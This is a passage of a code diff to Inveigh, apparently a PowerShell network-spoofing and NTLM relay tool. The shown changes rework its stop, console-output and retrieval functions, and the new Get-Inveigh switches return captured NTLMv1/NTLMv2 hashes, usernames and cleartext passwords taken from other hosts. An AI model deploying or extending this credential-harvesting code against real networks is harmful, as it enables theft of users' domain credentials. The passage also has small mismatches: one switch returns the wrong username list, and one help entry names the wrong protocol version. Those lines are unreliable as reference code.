$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) - Start-Sleep -m 5 - $inveigh.relay_running = $false - } - $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) Start-Sleep -m 5 @@ -1740,25 +1996,25 @@ $sniffer_scriptblock = while($inveigh.log_file_queue.Count -gt 0) { $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) + $inveigh.log_file_queue.RemoveAt(0) } while($inveigh.NTLMv1_file_queue.Count -gt 0) { $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) + $inveigh.NTLMv1_file_queue.RemoveAt(0) } while($inveigh.NTLMv2_file_queue.Count -gt 0) { $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) + $inveigh.NTLMv2_file_queue.RemoveAt(0) } while($inveigh.cleartext_file_queue.Count -gt 0) { $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) + $inveigh.cleartext_file_queue.RemoveAt(0) } } @@ -1796,9 +2052,9 @@ function HTTPListener() $HTTP_powershell = [PowerShell]::Create() $HTTP_powershell.Runspace = $HTTP_runspace $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument( - $HTTPBasicRealm).AddArgument($WPADAuth) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument( + $HTTPDir).AddArgument($HTTPResponse).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } @@ -1816,6 +2072,7 @@ function SnifferSpoofer() $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument( $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null $sniffer_powershell.BeginInvoke() > $null } @@ -1825,7 +2082,7 @@ function SnifferSpoofer() # Startup Enabled Services # HTTP Server Start -if(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'N') +if($inveigh.HTTP -or $inveigh.HTTPS) { HTTPListener } @@ -1838,7 +2095,7 @@ if($inveigh.console_output) if($ConsoleStatus) { - $console_status_timeout = new-timespan -Minutes $ConsoleStatus + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } @@ -1851,7 +2108,7 @@ if($inveigh.console_output) if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -1859,12 +2116,6 @@ if($inveigh.console_output) switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -1873,31 +2124,31 @@ if($inveigh.console_output) Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -2021,114 +2272,163 @@ if($inveigh.console_output) function Stop-Inveigh { - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + +if($inveigh) +{ - if($inveigh) + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + + if($inveigh.HTTP_listener.IsListening) + { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) { + $inveigh.unprivileged_running = $false + Start-Sleep -s 5 + Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null - if($inveigh.HTTP_listener.IsListening) + if($inveigh.file_output) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - } + } - if($inveigh.relay_running) + if($inveigh.relay_running) + { + $inveigh.relay_running = $false + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + + if($inveigh.file_output) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + if($inveigh.running) + { + $inveigh.running = $false + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - if($inveigh.running) + if($inveigh.file_output) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + } + else + { + Write-Output("There are no running Inveigh functions") + } + + if($inveigh.HTTPS) + { + & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - } - else + try { - Write-Output("There are no running Inveigh functions") + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() } - - if($inveigh.HTTPS) + catch { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + Write-Output("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - try + if($inveigh.file_output) { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - } } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null } + $inveigh.HTTP = $false + $inveigh.HTTPS = $false +} +else +{ + Write-Output("There are no running Inveigh functions")|Out-Null +} + } function Get-Inveigh { - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Log +Get log entries. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($Console -or $PSBoundParameters.Count -eq 0) +{ while($inveigh.console_queue.Count -gt 0) { @@ -2136,7 +2436,7 @@ function Get-Inveigh if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -2144,12 +2444,6 @@ function Get-Inveigh switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -2158,31 +2452,31 @@ function Get-Inveigh Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -2193,279 +2487,200 @@ function Get-Inveigh } -function Get-InveighCleartext +if($Log) { - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - + Write-Output $inveigh.log } -function Get-InveighNTLMv1 +if($NTLMv1) { - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } + Write-Output $inveigh.NTLMv1_list +} - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } +if($NTLMv1Unique) +{ + $inveigh.NTLMv1_list.Sort() - if($Unique) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - $inveigh.NTLMv1_list.Sort() + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account + Write-Output $unique_NTLMv1 } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list + + $unique_NTLMv1_account_last = $unique_NTLMv1_account } } -function Get-InveighNTLMv2 +if($NTLMv1Usernames) { - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. + Write-Output $inveigh.NTLMv2_username_list +} - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> +if($NTLMv2) +{ + Write-Output $inveigh.NTLMv2_list +} - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) +if($NTLMv2Unique) +{ + $inveigh.NTLMv2_list.Sort() - if($invalid_parameter) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - throw "$($invalid_parameter) is not a valid parameter." - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } - if($Unique) - { - $inveigh.NTLMv2_list.Sort() + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) +} - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } +if($NTLMv2Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } +if($Cleartext) +{ + Write-Output $inveigh.cleartext_list +} +if($CleartextUnique) +{ + Write-Output $inveigh.cleartext_list | Get-Unique } -function Get-InveighLog +if($Learning) { - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> + Write-Output $inveigh.valid_host_list +} - Write-Output $inveigh.log } function Watch-Inveigh { - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. +#> - if($inveigh.tool -ne 1) +if($inveigh.tool -ne 1) +{ + + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { + Write-Output "Press any key to stop real time console output" + $inveigh.console_output = $true - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + while($inveigh.console_queue.Count -gt 0) { - while($inveigh.console_queue.Count -gt 0) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else + switch -wildcard ($inveigh.console_queue[0]) { - - switch -wildcard ($inveigh.console_queue[0]) - { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } + "* written to *" + { - "* for relay *" + if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) } - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + $inveigh.console_queue.RemoveAt(0) + } - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } } - - } - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop } + + } - Start-Sleep -m 5 + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop } - } - else - { - Write-Output "Inveigh isn't running" + Start-Sleep -m 5 } } else { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" + Write-Output "Inveigh isn't running" } +} +else +{ + Write-Output "Watch-Inveigh cannot be used with current external tool selection" +} + } function Clear-Inveigh { - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } +if($inveigh) +{ + if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + +} } \ No newline at end of file